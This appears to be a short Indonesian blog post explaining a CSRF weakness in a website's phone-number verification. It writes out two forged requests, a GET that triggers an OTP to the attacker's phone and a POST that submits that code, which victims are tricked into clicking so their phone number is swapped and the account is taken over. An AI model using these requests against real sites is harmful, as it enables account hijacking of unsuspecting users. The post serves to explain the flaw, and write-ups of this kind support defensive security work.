Mengapa CSRF bisa terjadi? seperti contoh dibawah proses verifikasi nomor handphone tidak adanya sebuah token csrf, maka seharusnya jika tidak ada hal yang membatasi seperti CSP maka exploit akan berfungsi.
Membajak nomor Telepon
Step untuk melakukan:
- GET /ajax/msisdn.pl?action=event_sent_verification_code&phone=[attacker phone]&update_flag=&email_code=&v=[timestamp]
permintaan diatas dimana ketika korban mengklik maka secara tidak sada korban telah melakukan permintaan verivikasi kode untuk mengganti nomor teleponnya ke nomor telepon penyerang
- POST /msisdn-verification.pl?action=verifikasi&type=home phone=[attacker phone]&code=[PIN OTP yang diperoleh]&submit=
Ketika OTP atau Code verifikasi dikirim ke nomor telepon penyerang, langkah kedua penyerang harus membuat korban mengklik link diatas untuk mencapai pengambilalihan akun
Komentar
Posting Komentar